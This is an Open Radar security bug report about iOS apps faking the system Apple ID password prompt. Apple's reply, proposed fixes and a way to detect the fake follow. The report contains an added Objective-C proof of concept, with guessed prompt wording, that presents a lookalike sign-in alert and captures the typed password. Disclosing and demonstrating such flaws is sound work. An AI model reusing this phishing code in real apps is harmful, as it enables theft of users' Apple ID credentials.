Apple ID password prompts can easily be replicated, phishing attacks easily possible

Originator: igeek1
Number: rdar://34909608
Date Originated: 10-Oct-2017 09:54 AM
Status: Open
Resolved:
Product: iCloud
Product Version: iOS 11.0
Classification: Security
Reproducible: Always
 
Summary:
This is a duplicate of radar #34885659

iOS asks the user for their Apple ID (iTunes Store) password for many reasons; the most common ones are a recently installed iOS update, or an app download that is stuck while installing.

As a result, users are trained to enter their Apple ID password whenever iOS prompts them for it. However, these prompts are not only shown on the lock screen and the Springboard (home screen), but also inside arbitrary third-party apps, e.g. when an app accesses iCloud, Game Center or In-App Purchases.

Any app can abuse this simply by presenting a `UIAlertController` that looks exactly like the system dialog. The genuine prompt is itself a standard alert with a secure text field, so an app-created alert with the same title, message and buttons is indistinguishable on screen.

Even technically experienced users have a hard time detecting that such an alert is a phishing attempt, because the dialog carries no indication of which process presented it.


Steps to Reproduce:
Check out the project at https://github.com/KrauseFx/steal.password, in particular the README and the alert code in `M2GlobalState.m:222`.
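The following is an added example, not code from the original report or from the steal.password project, and reproduces the technique described above: a third-party app presents a plain `UIAlertController` whose title, message, buttons and secure text field imitate the iTunes Store sign-in prompt. The dialog strings approximate the wording of the real system prompt and are an assumption, as is the `PhishingDemoViewController` class name; the captured password is only logged locally.

```objc
// Added example (not the report's or the steal.password project's own code).
// Demonstrates that an ordinary app can present an alert that is visually
// identical to the system's Apple ID password prompt. The title, message and
// button labels are assumed approximations of the real prompt; the class name
// PhishingDemoViewController is hypothetical.
#import <UIKit/UIKit.h>

@interface PhishingDemoViewController : UIViewController
@end

@implementation PhishingDemoViewController

- (void)viewDidAppear:(BOOL)animated {
    [super viewDidAppear:animated];
    // Trigger the fake prompt at a plausible moment, e.g. right after the app
    // becomes visible, when a user expects to be asked to "finish" an update.
    [self presentFakeAppleIDPrompt];
}

- (void)presentFakeAppleIDPrompt {
    // Same alert class and style the system uses. Nothing in the rendered
    // dialog tells the user which process created it.
    UIAlertController *alert =
        [UIAlertController alertControllerWithTitle:@"Sign In to iTunes Store"
                                            message:@"Enter the password for your Apple ID."
                                     preferredStyle:UIAlertControllerStyleAlert];

    [alert addTextFieldWithConfigurationHandler:^(UITextField *textField) {
        textField.placeholder = @"Password";
        textField.secureTextEntry = YES;   // masked input, like the real prompt
    }];

    [alert addAction:[UIAlertAction actionWithTitle:@"Cancel"
                                              style:UIAlertActionStyleCancel
                                            handler:nil]];

    [alert addAction:[UIAlertAction actionWithTitle:@"Sign In"
                                              style:UIAlertActionStyleDefault
                                            handler:^(UIAlertAction *action) {
        // At this point the app holds the plaintext password. A real attacker
        // would exfiltrate it; this demo only logs its length locally.
        NSString *password = alert.textFields.firstObject.text;
        NSLog(@"Captured Apple ID password (%lu characters)",
              (unsigned long)password.length);
    }]];

    [self presentViewController:alert animated:YES completion:nil];
}

@end
```

Two practical notes. The genuine system prompt includes the user's Apple ID email address, which a third-party app normally does not know, so a phishing alert usually has to omit it or ask for both the Apple ID and the password; that is one of the few tells available today. The check recommended in the referenced project's README is to press the Home button while the dialog is showing: an alert presented by the app is dismissed together with the app, whereas a genuine system prompt survives.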

Expected Results:
Modern web browsers already do a good job of protecting users from phishing, because page content cannot draw the browser's own chrome such as the address bar. Phishing inside native mobile apps is a newer concept and still largely unexplored.

- System dialogs should be visibly marked as coming from the system
- Dialogs presented by apps could show the app icon in the top right corner of the dialog, to make clear which app is asking
- When the system needs the user's Apple ID password, it should open the Settings app instead of asking for the password in an in-app alert
- Fix the root of the problem: users shouldn't constantly be asked for their credentials. It doesn't affect all users, but I myself had this issue for many months, until it randomly disappeared.

Actual Results:
The app-presented dialog looks exactly like the system dialog, and users have no reliable way to tell whether they are being phished.

Version/Build:
iOS 11

Version:
iOS 11.0

Notes:

Comments

Message from product-security@apple.com

Hello Zev,

Thank you for filing this issue via Apple's bug reporting system. Apple takes every report of a potential security issue seriously.

We are already aware of this issue. Thank you for taking the time to pass it along to us.

Best regards,
Scotty
Apple Product Security

An alternative solution

Repost from the other radar: https://openradar.appspot.com/34885659

An alternative solution would be to show a screenshot of the Springboard when the system is requesting Apple ID credentials.

Each user's home screen is relatively unique and would be visible long enough, while they are entering their password, to give them time to register, subconsciously, that a fake home screen is showing.

The "springboard" could slide from the top, left or right and not overtake the whole screen, so users will still be able to resume their app when the system credentials are provided or denied.

Anything that is overlaid in any app could be engineered by any designer, but unique and complex elements like a user's wallpaper and home-screen icons are nearly impossible to recreate.

